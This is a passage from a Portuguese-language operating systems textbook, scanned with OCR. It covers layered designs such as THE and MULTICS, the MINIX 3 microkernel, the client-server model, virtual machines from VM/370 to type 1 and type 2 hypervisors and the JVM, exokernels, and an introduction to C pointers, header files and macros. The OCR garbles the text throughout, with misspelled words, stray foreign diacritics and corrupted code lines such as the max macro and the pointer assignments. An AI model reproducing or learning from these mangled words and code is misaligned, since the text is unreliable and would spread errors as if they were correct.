ustiarios, Essa divisao de rotinas em tres ca mada s e mos- 
trada na Figura 1,22, 

Alem do sistema operacional principal quc e carre- 
gado quando um computador e miciado, muitos sistemas 
operacionais dao su porte a exiensoes carregaveis, como 
drivers de E/S c sistemas de arqirivos. Esscs componcn- 
tes sao carregados eon formę a demanda. 



I Figura 1.22 urn modelo de estruiuraęao srmptes para om 
sistema monolitico. 


L7.2 I Sistemas de camadas 

Uma generał i za ęa o da abordagem da Figura L22 e a 
organizaęao do sistema operacional como uma hierarquia 
de camadas, cada uma dclas consmuda sobre a ca ma da 
imediatanienie inferior. O primeiro sistema construido 
dessa maneira foi o THE, cuja sigla deriva do Technische 
Hogeschool Eindlioven, na Hol a n da, ondc foi implementa- 
do por E.W. Dijkstra (1968) e scus a I u nos. O sistema THE 
era um sistema em lote (bakh) simplcs para um computa- 
dor hol a n des, o Elcctrologica X8, que tinha 32 K de pala- 
vras de 27 bits (os bits eram caros naquela epoca). 

O sistema possufa seis camadas, conforme mostra a Ta¬ 
bela 1.3. A camada 0 tratava da alocaęao do processador, 
realizando chavcamento dc proccssos quando ocorriam 
as intcrmpęoes ou quando os temporizadores expiravain. 
Ad ma da camada 0, o sistema era formado por proccssos 
sequendais; cada um deles podia ser programado sem a 
preocupaęao com o fato dc multiplos proccssos estarcm 
executando em um unico processador. Em outras pa!avras, 
a camada 0 forneda a multiprogramaęao basica da CPU. 

A camada 1 encarregava-se do gerendamento de me- 
moria. Ela alocava cspaęo para proccssos na memória prin¬ 
cipal c cm um tambor magnetico dc 512 K pa la v ras, que 
armazenava as partes de proccssos (paginas) para os quais 
nao havi a espaęo na memória principal. Acima da ca ma¬ 
da U os proccssos nao precisavam prestar atenęao a se es- 
tavam na memória principal ou no tambor magnetico; a 
camada 1 cuidava disso, assegurando que as paginas eram 
trazidas para a memória principal quando necessario. 


Camada 

Funęao 

5 

0 operador 

4 

Programas de usuario 

3 

Gerendamento de entrada/saida 

2 

Comunicaęao operador-processo 

1 

Memória e gerendamento de tambor 

0 

Alocaęao do processador e multiprogramaęao 


I Tabela 1.3 Estmtura do sistema operacional THE. 
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A ca mada 2 encarregava-se da comunicaęao emrc cada 
processo c o console de operaęao (isto e, o usuario). Acima 
dessa camada, cada processo tinlia efetivamente sen pró- 
pno console de operaęao. A camada 3 encarregava-se do 
gerendamento dos dispositivos dc E/5 e armazcnava tern- 
porariamente os ftuxos dc infomiaęao quc iam para csscs 
dispositivos ou que vinham deles, Adma da camada 3, cada 
processo podia lidar com dispositivos abstratos de E/S rnais 
amigaveis, cm vez de dispositivos reais cli dos de pecu- 
liarklades, Na camada 4 encontravam-se os programas de 
usuario. Eles nao linliam de se preocupar com o gerencia- 
mento de processo, de memória, console ou E/S. O pro¬ 
cesso operador do sistema estava locallzado na camada 5. 

Outra generalizaęao do conceito dc camadas eslava 
presente no sistema MULTICS. Em vez de camadas, o MUL¬ 
TICS era desćrito como uma serie de aneis concemricos, 
sondo quc cada and Interno era mais privilegiado que oś 
externos. Quando uma rotina em um anel externo que- 
ria chamar urna rodna no anel interno, ela deveria fazcr o 
equivalente a uma chamada de sistema, isto e, uma instru- 
ęao de dcsvio, TRAP, e a validadc dos parainctros era cuida- 
dosamente verificada a mes de permitir que a chamada con¬ 
tinua sse. Embora no MU EH CS todo o sistema opera ci on a) 
fosse parte do espaęo de endereęamento de cada processo 
de usuario, o hardware possiMitava ao sistema designar 
rotinas individuais (na verdade, segmentos de memória) 
como protegidas contra leitura, escrita ou ex ecu ęao, 

O esquema de camadas do sistema THE era semen¬ 
ie um suporte ao projeta pois todas as partes do sistema 
eram, ao finał agntpadas em um unico programa-objeto. 
Ja no MULTICS, o mecanismo de aneis estava muito mais 
presente cm tempo de cx ccii ęao c reforęado pdo hard¬ 
ware, Essc mecanismo de aneis era vantajoso porque po¬ 
dia facilmente ser estendido para estru tu rar subsistemas 
de usuario, Por exemplo, um professor podia escrever um 
programa para testar e atribuir noias a programas de alu- 
nos executando-o no and n t enąuamo os programas dos 
alimos seriam execmados no anel n + I, a firn de que ne¬ 
nii um deles pudesse allerar suas notas, 

1,7.5 I Micronucleo 

Com a abordagem do sistema de camadas, os projetis- 
tas padem escolher onde traęar a fronteira nucleo-usuario. 
Tradidonalmente, todas as camadas entram no nucleo, mas 
isso nao ć necessario. Na realidade, apresentam-se fortes 
argtnncntos para coiocaęao do mfnimo possivd em modo 
nucleo porquc erros no micleo podcm derrubar o sistema 
instantaneamente. Por outro lado, processos de usuario 
podcm ser configurados com menos potencia dc modo quc 
um erro nao seja fatal 

Varios pesquisadores tein estudado o numero de erros 
por mil Mnhas de código (por exempIo, Basilli e Perdcone, 
19S4: Ostrand c Weyuker, 2002). A densidade de erros de- 
pende do tamanho do módulo, da idadc do modni o etc.. 


mas uma cifra aproximada para sistemas industriais serios 
e de dez erros por mil Ilnhas de código. Isso significa que e 
provavel que um sistema operacional monolitico de cinco 
milhoes de linhas de código contenha algo como 50 mil 
erros no nucleo. E claro quc nem todos sao fatais, visto quc 
alguns erros podcm ser coisas como emitir uma mensagem 
dc erro incorrcta cm uma situaęao quc raramente ocor- 
rt\ Contudo, os sistemas opcracionais sao su fi ci cn te men te 
sujdtos a erro e, por isso, os fabricames de computadores 
inserem bot o es de rei ni ciał i za ęao neles (freątien ternem e 
no painel frontał}, algo que fabricames de aparelhos de TV, 
radios e carros nao fazem, apesar da grandę ąuantidade de 
softwares nesses dispositivos. 

A ideia basica por tras do projeto do micronucleo e al- 
canęar alta confiabilidade por meio da divisao do sistema 
operacional em módulos pequenos, bem defimdos, c ape- 
nas um desses módulos — o micronucleo — e executado 
no modo nucleo e o restante e executado como processos 
dc usuario comuns rdaiivamcnie sem potencia. Em parti- 
cular, ąuando ha a execuęao de cada driverde dispositivo e 
de cada sistema de arquivos como um processo de usuario 
separado, um erro em um deles pode quebrar aqude com- 
ponente, mas nao pode quebrar o sistema intern Dessc 
modo, um erro na unidade de audio fara com que o som 
seja adulterado ou interrompido, mas nao travara o com- 
putador. Por outro lado, cm um sistema monolitico, com 
todas as unidades no nucleo, uma unidade de audio defci- 
tuosa pode facilmente dar como referenda um endereęo 
dc memória invalido c parar o sistema instant a neamente. 

Muitos micronucleo foram implememados e utiliza- 
dos (Accetta et al., 1986; Haertig et al, 1997; Heiser et al., 
2006; Herder et al, 2006; Hildebrand, 1992; Kirsch et 
al., 2005; Liedlke, 1993, 1995, 1996; Pikę et al, 1992; Zu¬ 
ber! et al., 1999). Eles sao espedalmente comuns em apii- 
caęóes de tempo rcal, industriais, dc avionica c militares, 
quc sao crudais e tern rcquisitos dc confiabilidade muito 
allos. Alguns dos micronudcos mais conliccidos sao In- 
tegrity, K42, L4, PikcOS, QNX, Symbian c MIMIX 3, Eare- 
mos agora um breve resumo do MINIK 3, que levou a ideia 
de modularidade ao linii te, decompondo a maior parte do 
sistema operacional em varios processos independentes no 
modo usuario. O MIN1X 3 e um sistema de código aberto 
dispomvel gratuitamente em <www.minix3.org> ecompati- 
vel com o POSIX (Herder et al, 2006a; Herder et al., 2006b). 

O micronucleo do MI NIX 3 tem apenas cerca de 3.200 
linhas de C e 800 linhas de assembler para funęoes de nfvel 
muito baixo, como comenęao de interrupęoes e processos 
de chaveamento. O código C gerenda e escalona proces¬ 
sos, controla a comimicaęao entre processos (trocando 
mensagens entre eles) e oferece um eon junto de cerca de 
35 chamadas ao nucleo para permitir que o resto do sis¬ 
tema operacional faęa seu trabalho. Essas chamadas exe* 
cmam funęocs como assodar os manipuladores (handkn) 
os interrupęóes, transferir dados entre cspaęos dc cndcrc- 
ęa mento c instalar novos ma pas dc memória para proces- 
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sos recem criados. A esirutura de processo do M1N1X 3 e 
mostrada na Figura 1.23 e os manipuladores de chama da 
de nudeo (kernd cal! handlers) sao rotuiados como Sys. O 
driver de dispositivo para o relógio tambem esta no nudeo 
porque o escalonador interage proximamente com cle. To- 
dos os outros drivcrs dc dispositivo operam scparadanicntc 
como processos dc usuario. 

Fora do nudeo, o sistema e estrumrado cm tres ca- 
madas de processos, todas executando em modo usuario. 
A caniada inferior contem os drivers de dispositivos* Visio 
que des executam cm modo usuario, nao rem acesso Esico 
ao cspaęo dc porta dc E/S e nao podcm cmitir comandos dc 
E/S diretamente, Em vcz disso, para programar um dispo- 
sitivo dc E/S, o drivcr constrói urna estru tura dizcudo quc 
valores escrcvcr cm quais parias dc E/S c gera urna chama - 
da ao nudeo para realizar a escrita. Essa abordagem per- 
mite que o nudeo verifique o que o driver esta escrevendo 
{ou Lendo^ a partir da E/S que esta autorizada a milizar. 
Conseąuenteniente (c diferentemente do p roje to monolf- 
tico), uma unidade de audio defeituosa nao pode escrever 
addentalmente no disco. 

Acima dos drivcrs esta outra ca mada no modo usua- 
rio que contem os $ervidores, qtie fazem a major parte do 
trabalho do sistema operacional. Um ou mais servidores de 
arquivos gerenciam o{s) sistema(s) de arquivo, o gerencia- 
dor de proccssos cria, destrói e gerencia processos etc. Os 
programas de usuarios obtem serviqos do sistema operado- 
nal enviando mensagens cnrtas aos servidores solicitando 
chamadas dc sistema P0S1X, Por exemplo, um processo 
ąue precisc fazer um read cnvia uma mensagem a um dos 
scrvidorcs dc arquivo dizcndo-lhc o quc ler. 

Um servidor interessante e o servidor de reencar- 
naęito, cujo trabalho e verificar se os outros senddores e 
drivcrs estao funcionando corretamente. Nos ca sos em que 
se detecta uma unidade defeituosa, da e a n t oma ti ca menie 
substitiuda sem nenhuma intervenęao do usuario* Desse 
modo, o sistema e capaz de autorrecuperaęao e pode atin- 
gir grandę eonfiabilidade* 


Esse sistema tem muitas restrięoes que limitam a 
potencia de cada processo. Como mencionado anterior- 
meme, os drivers podem tocar apenas portas de E/S au- 
torizadas, mas o acesso a chamadas ao nudeo tambem e 
controlado por processo, assim como a caparidade dc en- 
viar mensagens a outros proccssos* Os processos tambem 
podem conceder autorizaęao limitada a outros para quc o 
nu cl co acessc sens espaęos dc endereęamenlo. For cxcm- 
plo, um sistema de arquivos pode perm iii r quc a unidade 
de disco deixe o niicleo colocar uma Id tura recente de um 
bloco do disco em mu endereęo especifico no espaęo de 
endereęo do sistema dc arquivos. A soma dc todas cssas 
resirięoes ć que cada driver e semdor tem exatametue a 
potencia para fazer sen trabalho e nada mais, o que llmita 
enormemente os da nos qtie poderiam ser causados por 
um componente defriiuoso. 

Uma idcia reladonada ao nudeo imnimo e colocar o 
mecanismo para fazer algo no nudeo e nao a polftica. 
Para comprecndcrmos melhor esse porno, considercnios 
o escalonamento de processos. Um algoriimo de escalona- 
mento rclaLivamcnie simples e ambuir uma prioridade a 
cada processo e, em seguida, fazer com que o nudeo exe- 
cutc o processo executavd dc maior prioridade* O meca- 
nismo — no nudeo — e procorar o processo de maior prio- 
ridade c cxecuta-lo. A polftica — atrilniir prioridades aos 
processos — pode ser feita por processos de modo usuario. 
Desse modo, polftica e mccanismo podem ser desacoplados 
e o nudeo pode ser reduzido. 

1-7.4 I O modefo cliente-servidor 

Uma ligeira variaęao da ideia do micronucieo e distin- 
guir entre duas classes de processos, os servidores, que 
prestam algum servięo, e os clientes, que usam esses ser- 
vięos. Esse modeio e conhecido como model o do cliente- 
-servidor. Frequcntemerue a camada inferior e o micro- 
nuclco, mas dc nao ć obrigatório. A cssencia ć a presenęa 
dc proccssos clicntcs c servidorcs. 



I Figura 1.23 Estrutura ĆO Sistema MlMIX 3. 
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A comunicaęao entre dientes e semdores e muitas ve- 
zes realizada por meio de iroca de mensagens. Para obter 
lim servięa um processo di en te constrói unia mensagem 
dizeudo o que deseja c a en.via ao servięo apropriado. Este 
faz o trabalho e cnvia a resposta dc volta. Sc o dienic e 
o servidor forem executados na mesma maąuina, ccrtas 
otimizaędes sao possivds, mas, concdtualmcnte, estamos 
falando dc troca dc mensagem neste caso. 

Unia generalizaęao óbvia dessa kicia e ex-ecutar dien¬ 
tes c semdores cm computadores diferentes, eonectados 
por unia rede iocal ou dc grandę area, conforme a ilustra- 
ęao da Figura 1.24. Unia vcz que os dientes sc coniunicam 
com os servidores enviando mensagens, des na o prccisam 
saber se as mensagens sao entregues local men te cm suas 
próprias maąuinas ou sc sao enviada$ au avcs dc unia rede 
a semdores em uma maąuina rcmoia. No que se refere aos 
dientes, o mesmo ocorre em ambos os casos: solidtaęóes 
sao enviadas e as resposias, devolvidas. Dessa forma, o mo¬ 
dele cliente-semdor e uma abstraęao que pode ser usada 
para uma unica maąuina ou para uma rede dc maąuinas. 

Cada vcz mais varios sistemas cnvo!vem usuarios cm 
sens computadores pessoais r como dientes e maąuinas 
grandes em outros lugares, como servidores. De falo, gran¬ 
dę parte da Web opera dessa forma. Um PC envia uma so- 
licitaęao de pagina da Web ao servidor e a pagina da Web 
ret om a. Esse e um uso npico do modelo dieme-servk!or 
em uma rede. 

1-7-5 I Maquinas virtuais 

As versdes iniciais do sistema opcracional GS/360 
cram estritamente em fole (batek). Porem, muitas usua¬ 
rios do fBM 360 desejavam compartilliamenlo dc tempo. 
Entao, varios grupos, dc dentro c dc fora da IBM, dcci di- 
ram escrever sistemas de tempo comparlilhado para o IBM 
360, O sistema de tempo com parli! ha do oficial da IBM, o 
TSS/360, foi lanęado rrmito tarde e, ąuando finaimente se 
tornou mais popular, estava tao grandę e lento que pou- 
cos dientes comeneram suas apllcaęoes, Ele foi finalmcnte 
abandonado depois deja ter consumido cerca de 50 mi- 
Ihoes de dólares cm sett deseńvolvimento (Graham, 1970). 
Mas u ni grupo do Centro Oentffko da IBM cm Cambridge, 
Massachusetts, prodtiziu um outro sistema, radicalmente 


diferente, que a IBM finalmente adoiou. Um descendente 
linear desse sistema, chamadoz/VM, agora e amplamente 
usado nos computadores de grandę porte atuais da IBM, 
a serie z, que sao muito utilizados em grandes ccntros de 
dados corporativos, por cxcmplo, como scrvidores dc co- 
mcrcio elctromco quc controlam cemcnas dc milharcs dc 
transaęocs por segundo c usam bases dc dados cujo tama- 
nho penie chegar a milhdcs dc gigabyles* 

VM/3 70 

Esse sistema, odginaInieme denominado CP/CMS 
c depois renomeado YM/370 (Scawright e MacKirmon, 
1979), foi baseado cm uma observaęio perspicaz: um sin¬ 
ienia dc tempo comparlilhado fornece (1) muliiprogra- 
maęao c (2) uma maąuina estendida com uma imerface 
mais convcuicnte do quc a quc o hardware oferece, A 
essenria do VM/370 c a separata o completa dessas duas 
fumęoes, 

O coraęao do sistema, conhecido como monitor 
de maąuina virtual, c execmado diretamente sobre o 
hardware c implementa a multiprogramaęao, provcndo 
assim nao uma, mas varias maąuinas virtuais para a pró- 
xirna ca mada situada acima, conforme rnostra a Figura 
1.25. Contudo, ao contra no dos demais sistemas opera- 
cionais, cssas maąuinas virtuais nao sao maąuinas esten- 
didas, com arquivos e otitras caraetensticas convenienies. 
Na verdade, sao cópias exatas do hardware, indusive com 
modos nudeo/usuario, E/S, mtcrrupęoes c tu do o que 
uma maąuina real Lem. 

Como cada maąuina virtual e uma cópia exata do hard¬ 
ware, cada uma dclas pode execurar ąualąuer sistema opc- 
racional capaz dc ser exccutado diretamente sobre o har¬ 
dware. Diferentes maąuinas viriuaispodern — c isso ocorre 
com freąuenda — executar diferentes sistemas opera cio¬ 
nais. Em algumas dessas maąuinas virmais e execuiado um 
dos sistemas operacionais descendemes do Os/360 para 
processamcnto em lote (batch) ou de transaęoes, enąuan- 
to se execula em ouiras um sistema operacionai monou- 
suario interatlvo, denominado CMS (mmmatioml monitor 
system — sistema monitor eon ver sad o md), dedicadoa usu¬ 
arios interaiivos em tempo comparlilhado, o qual era po¬ 
pular entre os programadores. 
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R Figura t,24 O modelo ciiente-seryidor em uma rede. 
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Instruęćes E/S aqui 
Trap aqui 


WtuaE 370S 



I Figura 1.25 Estmtura do Wl/370com CMS, 


Quando um programa CMS exccuta uma chama - 
da dc sistema, da ć desviada para o sistema operacional, 
que exeaua cm sua própria maąuina virUial H c na o para o 
YM/370, como se estwesse executando sobre urna maqui- 
na real c nao sobre uma maąuina yirtual. Entao, o sistema 
operacional CMS emite as insmięoes normais de hardware 
para E/S a firn de, por exemplo, ler seu disco yirtual ou 
executar outro servięo ąualąuer pedido pela chamada. 
Essas instruęóes de E/S sao, por sua vez, desvladas pelo 
VM/370, que as cxccuta como parte de sua simulaęao do 
hardware real. A panir da separaęao complcta das funęocs 
de multiprogramaęao c da provisao dc uma maąuina es- 
tendida, podc-sc terpanes miii to mais simples, flexfveis c 
faceis de serem mantidas, 

Em sua encarnaęao moderna, o z/VM normalmente 
e utilizado para executar sistemas operacionais completos 
multiplos em vcz dc sistemas dc usuario unico desmonta- 
dos como o CMS. Por cxemplo r a serie z ć capaz dc cxe- 
cutar uma ou mais maąuinas virtuais Linux com sistemas 
operacionais IBM tradicionais, 

Maąuinas virtuais redescobertas 

Embora a IBM ten ha um produto de maąuina yirtual 
disponivel ha quatro deeadas e aigumas outras compa- 
lihias, indusive a Sun Microsystems e a Hewlett-Packard, 
tenham acrescentado receniemente um suporte dc maqui- 
na virtual a seus servidores empresariais dc ałto desempe- 
nho, a kicia de yirtualizaęao foi em grandę medida ignora- 
da na industria da computaęao ate pouco tempo a tras. Mas, 
nos liliimos anos, uma combinaęao de novas necessidades, 
novos softwares e novas tecnologias tornou essa ideia um 
topico de imeresse. 

Primeiro as necessidades, Muitas companhias tradi- 
cioiialmente excctitavam seus semdores dc corrcio, ser- 
vidores da Web, servidores FTP e outros em computadorcs 
se parad os, aigumas vezes com sistemas operacionais dife- 
rentes, El as percebem a yirtualizaęao como um modo de 
ex ecu lar lodos des na mesma maąuina sem que uma falha 
cm um servidor afete o resio, 

A yirtualizaęao tambem ć popular na industria de 
hospedagem de pa giną s da Web, Sem a yirtualizaęao, os 
cli en te $ da hospedagem na Web sao foręados a escolher 
entre hospedagem eona partii ha da (que Ihes da ape- 
nas uma conta de acesso a um seryidor da Web, mas nao 


Ihes permite eon troi ar o software do scrvidor) c hospe¬ 
dagem dedicada (quc Ihes oferece uma maąuina própria, 
que e mu i to flexfvei mas pouco economica para sites da 
Web de peąueno a medio porte). Quando uma compa- 
nhia de hospedagem na Web aluga maąuinas virtuais, 
uma tiiiiea maąuina ffsica pode executar muitas maąui¬ 
nas virtuais e cada uma delas parece ser uma maąuina 
eompleta. Os cliemes que alugam uma maąuina Yirtual 
podem executar quaisquer sistemas operacionais c soft- 
wares que desejem, mas por uma fraęno do custo dc um 
scrvidor dcdicado (porąuc a mesma maąuina ffsica da 
suportc a muitas maąuinas yirtuais ao mesmo tempo). 

A yirtualizaęao tambem e utilizada por usuarios finais 
que ątierem executar dois ou mais sistemas operacionais 
ao mesmo tempo, por exemplo Windows e Linux, porąuc 
alguns de seus pacotes de aplicaęóes favoritos sao executa- 
dos cm um dos sistemas e outros pacotes em outro sistema. 
Essa situaęao e iiustrada na Figura 1.2ó(a), na qual o termo 
'monitor dc maąuina yirtual' foi alteradopara hipervtsor 
tipo 1 nos ultimos a nos. 

Agora o software. Embora ninguem discuta a airatm- 
dade das maąuinas yirtuais, o problema foi a uiiplemen- 
taęao. Para executar o software de maąuina yirtual em 
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uni computador, sua CPU deve ser virmalizavd (Popek 
e Goldberg, 1974). Em po u ca s palavras, ha um probie¬ 
rnia neste caso. Quando um sistema operacional sendo 
executado em uma maąuina virtual (em modo usuario) 
cxccuta uma instruęao privilegiada, como modificar a 
PS W on fazcr E/S r 6 essencial quc o hardware cric um 
dispo^itivo para o monitor da maąuina virtuak dc modo 
ąue a instruęao possa ser emulada em software. Em al- 
gurnas CPUs — pnncipalmeme Pentium, sens predeccs- 
sores e sens elones — tentatjvas de executar instruęoes 
nao privilegiadas no modo usuario sao simplesmente 
ignoradas. Essa propńedade impossibilitou a existenria de 
maąuinas Yirtuais nesse hardware, o que explica a fal- 
ta dc interesse na mdustria da compmaęao. fi claro que 
havia interpretadores para o Pentium quc cram exccma- 
dos nelc mas, com uma perda dc desempenho dc 5-10x 
cm gcral, cles nao cram uteis para trahalhos importantes. 

Essa situaęao mudou como resuliado de varios proj etos 
de pesąuisa acadcniica na decada de 1990, particularmente 
o Disco em Stanford {Bugnion et al., 1997), que eon duzi u a 
produtos comerdais {por exemplo, VMware Workstation) 
e a uma retomada do interesse em maąuinas viriuais t O 
VMware Worsktation e um hipervisor de tipo 2, mostrado 
na Figura 1.2ć(b). Ao contrario dos hipervisores dc tipo L 
que sao executados diretamentc no hardware, os hipervi- 
sores de tipo 2 sao exconados como programas aplicatieos 
na ca mada superior do Windows, Lmux ou a [gum outro 
sistema operacional conheddo como sistema operacio- 
nal hospetleiro. Depois de ser iniciado, um hipemsor de 
tipo 2 le o CD-ROM de instalaęao para o sistema opera¬ 
cional hóspede escolhido c instala um disco virtual, quc 
e s 6 um arquivo grandę no sistema de arquivos do sistema 
o p c ra ci o na I li osp c d ci r o. 

Quando o sistema operacional hóspede e iniciallzodo, 
faz o mesmo que no yerdadciro hardware, normaImenie 
iniciando algum processo subordinado c, cm seguida, uma 
imerface grafica GUI. Alguns hipervisores traduzem os pro¬ 
gramas binarios do sistema operacional convidado bloco a 
bloco, substimindo dcicrmmadas instruęoes de eontrole 
por chamadas ao hipcrvisor. Os blocos trąduzidos sao exe- 
cutados c annazenados para uso posterior. 

Uma abordagem difercruc para o gerenciamemo de 
instruęoes de com role e modificar o sistema operacional 
para remove-las. Essa abordagem nao e uma virtualjzaęao 
autenlica, e sini uma paravirtualizaęao, Discutiremos a 
Yirtualizaęao em maiores detalhes no Capimlo S. 

A maąuina virtual Java 

Outra area na qual maąuinas yirtuais sao usadas, mas 
de maneira um pouco diferente, e na execuęao de progra¬ 
mas Java. Quando a Sun Microsystems imentou a lingua- 
gem de programaęao Java, inventou tambem uma maąuina 
virtual (isto ć, uma arąuitctura de computador) denomina- 
da JVM (Jiwa yińuai machim — maąuina virtual Java). O 
compilador Java produz código para JVM, quc entao nor- 


malmente e exectitada por um programa interpretador da 
JVM. A vantagem desse sistema e que o código JVM pode 
ser erwiado pela Internet a qualquer computador que tenha 
um interpretador JVM e ser executado la. Se o compilador 
produzisse, por excmplo, código binario para a SPARC ou 
para o Pentium, esses códigos nao poderiam ser tao faril- 
mente levados dc um lugar para outro, {fi claro quc a Sun 
poderia ter produzido um compilador que gerasse código bi¬ 
nario para a SPARC e entao ter distribuido urn interpretador 
SPARC, masa JVMe uma arąuiteiura rrniitomais simplesde 
interpretar.) Outra vantagem do uso da JVM e a seguinte: se 
o interpretador for implementado adeąuadamente — o que 
nao e muito comuni —> os programas JVM que chegatn po- 
dem ser verificados, por seguranęa, e entao executados em 
um ambiente protegido, de modo que nao possani roubar 
dndos ou causar quaisquer da nos. 

1-7.6 I Exonudeo 

Em vcz de clonar a maąuina real, como e feito no caso 
das maquinas Yirtuais, outra estrategia e dividNa ou, em 
outras palavras, dar a cada usuario um subconjunto de re- 
cursos. Assiin, uma maąuina vinual pode obter os blocos 0 
a L023 do disco, uma outra os blocos 1.024 a 2.047 e aśsim 
por dianie. 

Na camada mais inferior, executando em modo tiucleo, 
ha um programa denominado exoruideo, Sua tarefa e alo- 
car rccursos as maąuinas Yirtuais c entao verificar as tenta- 
livas de usa-los para assegurar-se de quc nenii uma maąuina 
esteja temando usar rccursos de outra. Cada maąuina vimi¬ 
ał, em nivd de usuario, pode executar scu próprio sistema 
operacional como no YM/370 c na maąuina virtual 8056 
do Pentium, exceto que cada uma esia restrita a usar semen¬ 
ie os recursos que pedlu e que foram alocados, 

A vantagem do esąuema exonucleo c que ele poupa 
uma camada de mapeamenio. Nos outros pr oj etos, cada 
maąuina virtual pensa que tem scu próprio disco, com blo¬ 
cos indo de 0 a um va!or rnaximo, de modo que o moni¬ 
tor de maąuina virmal deve manier tabelas para remapear 
os endereęos de disco (e todos os outros recursos). Com o 
cxon uciec, esse mapeamenio deixa de ser necessario, Ele 
precisa somente manier o registro de para qual maąuina 
virtual foi atribuido qual recurso. Esse metodo ainda tem a 
vantagem adicional de separar, com menor custo, a multi- 
programaęao {no exontideo) do código do sistema opera- 
cional do usuario (no espaęo do usuario), ja que tu do que 
o exoniicleo tem dc fazer e manier as maąuinas yirtuais 
u mas fora do alcance das outras. 


1.8 


O mundo de acordo com a 
linguagem C 


Os sistemas operacionais normaImentc sao grandes 
programas C (ou algumas vczes C++), quc consistem dc 
muitos fragmentos cscritos por muitos programadores. O 
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ambiente usado para desenvolver sistemas operacionais e 
muito di Terenie daquele a que estao acosttnnados os mdi- 
vfduos (como os estudantes) quando escrevem pequenos 
programas Java. Esta seęao e u ma tentativa de fazer unia 
breve iniroduęao ao mundo da eserita de sistemas opera¬ 
cionais para programadores de Java modestos, 

1-8-1 I A linguagem C 

Esie nao e urn giiia para a linguagem C, mas urn breve 
resumo das difcrenęas emre C e Java. A linguagem Java e 
baseadaem C, porissoha muitassemelhanęasentre as duas. 
Ambas sao linguagens imperativas com lip os de dados, va- 
riaveis e comandos de controle, por cxempIo < Os tipos de 
dados primitivos cm C sao numeros inteiros (indusive cur- 
tos e longos), caracleres c numeros de ponto Iluluante. Ti¬ 
pos de dados composios podem ser coiistmidos usando ar- 
ranjos (arrays), estruluras {structum} e unioes {urnom}* Os 
comandos de comrole em C sao semelhantes aos de Java, 
indusiye os comandos if, switch, for e whilc. Rmęoes e 
parameiros sao ąuase os rnesmos em ambas as linguagens. 

Urna caractenstica dc C que Java nao icm sao os pon- 
leiros oplfcitos, Urn ponteiro ć unia variavel que aponta 
para urna variavel oia estrutura dc dados (isio e, contem o 
cndereęo dela). Considere as linbas 

charci, c2. *p; 

cl = c'; 

p - &d; 

c2 = *p; 

que dedaram que cl e c2 sao variaveis do tipo caracier e que 
p e urna variavel que aponta para mn caractere (isto e, cen¬ 
tem o cndereęo dele). A primeira atribuięao armazena o 
código ASCII para o caractere 'c' na variavel cl. A segunda 
airibui o cndereęo de cl a vanavel ponteiro A lerceira atri- 
bui os conteudos da variavel apontada par p a variavel c2; 
desse modo, depois que esses comandos sao executados, c2 
tambem contóm o código ASCII para 'e\ Na teoria, os pon- 
teiros sao tipificados; assim, programadores nao deveriam 
airibuir o endereęp de um mi mero em porno fluiuante a 
um ponteiro de caractere, mas, na pratica, os compilado- 
res aceitam essas atribuiędes, embora algumas vezes com 
urna advertcncia, Os ponieiros sao u ma consiruęao mui- 
lo e fi ca z, mas tambem urna grandę fonie de erros quando 
usados sem cuidado. 

C nao tern, entre outras coisas, cadeia de caracteres 
incorporadas, threads, pacotes, classes, objetos, seguranęa 
de tipos (typesafety) e colelor de lim O ultimo e um defei- 
lo fatal para sistemas operacionais. Todo o armazenamen- 
to em C e estatico ou explicitamente alocado e liberado 
pelo programador, normalnienie com a funęao bibliotece 
malloc t free. fi a ultima propriedade — contro!e total do 
programador sobre a memória — com pontciros explicitos 
que torna a linguagem C atraeme para a escrita de siste- 
mas operacionais. Os sistemas operacionais sao, ate certo 
porno, sistemas cm tempo real mesmo no caso de siste¬ 


mas de propósito geral. Quando oeorre urna interrupęao, 
o sistema opera ci ona I pode ter a pena $ alguns microsse- 
gundos para executar alguma aęao ou perder informaęóes 
criticas* A en t rada cm operaęao do cole tor de lixo cm um 
moment o arbitra lio e intoleravel. 

1.8,2 I Arquivos de cabeęalho 

Um projeto dc sistema opcracional geralmcmc consis- 
te em alguns diretórios, cada um eontendo muitos arqui- 
vos .o que contem o código para alguma parte do sistema, 
com alguns arquivos de cabeęalho {header} Ji que contem 
deelaraęoes e dcfinięoes usadas por um ou mais arquivos 
de código. Arquivos de cabeęalho tambem podem induir 
macros, como 

#define BUFFER_SfZE 4096 

que permilem quc o programador nomcic constames, dc 
modo que, quando o BUFFER_S!ZE for usado no código, 
seja substituido d u ran te a compilaęao pelo numero 4096. 
Urna boa pratica dc programaęao em C e nornear todas as 
constantcs exccto 0, 1 e -1 e, algumas vezcs, nornear ate 
mesmo essas. As ma eros podem ter parameiros, como 

tfdefine max(a, b) (a > b 7 a : b) 
que permitem que o programador escrcva 

f = max(j r k+1) 
e obLenha 

Mj> k+1 7 j: k+1) 

para armazenar a maior pane dej e k+l cm i. Os ca be ca Ih os 
tambem podem conLercompilaęaocondidonal porcxemplo 

#ifdef PENTIUM 

intel_int_ack(); 

flendif 

quccompila u ma cha mada a fu nęao inte!_hit_ack aymns sc 
a ma ero PENTIUM for definida. A compilaęao eon di clona! e 
muito utilizada para isołar códigos dependentesdc arquile- 
tura, de modo que certo código seja inserido apenas quando 
o sistema for compilado no Pentium, outro código seja in¬ 
serido apenas quando o sistema for compilado no SPARC, e 
assim por dianie, Um arquivo .cpode induir conjuntamen- 
te zero ou mais arquivos dc cabeęalho usando a instruęao 
#indude. Ha tambem muitos arquivos de cabeęalho co* 
muns a quase todo ce csses sao armazenados em um di- 
retório central. 

1-8.51 Grandes projetos de programaęao 

Para construir um sistema operacional, cada xi compi¬ 
lado em um arquivo-objęto pelo compilador C. Arquivos- 
- objęto, que tern o sufixo c, contem instruęoes hinarias para 
a maquina-destino. Elcs sera o executados poste riormente 
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pela CPU. Nao hi nada semelhanie ao Java byle codę e, o 
código Java compilado para a JVM, na linguagem C. 

O primciro passo do compilador C e cha mado pre- 
-processador C. Quando Ic cada arqtiivo x t loda vcz quc 
atingc urna instruęao timdude, ele cap tura o arquivo de ca- 
beęalho nomeado c o processa, expandindo ma eros, con- 
troJando a compilaęao adicional (e outras coisas) e transfe- 
rindo os rcsuliados ao próximo passo do compilador como 
se des estivessem fisicameme tnclufdos* 

Urna vcz que os sistemas operationais sao muilo gran- 
des (cinco mil ho es de linhas de código nao sao ineomtuis), 
compilar tudo novameiue a cada vez quc urn arquivo fos- 
se alterado seria inaceitavel. Por outro lado, alterar urn 
arquivo de cabeęallio import antę que esteja indu ido em mi- 
Ihares de outros arquivo$ requer nova compilaęao desses 
arquivos. Acompanhar quais arqtiivos-objeto dependem 
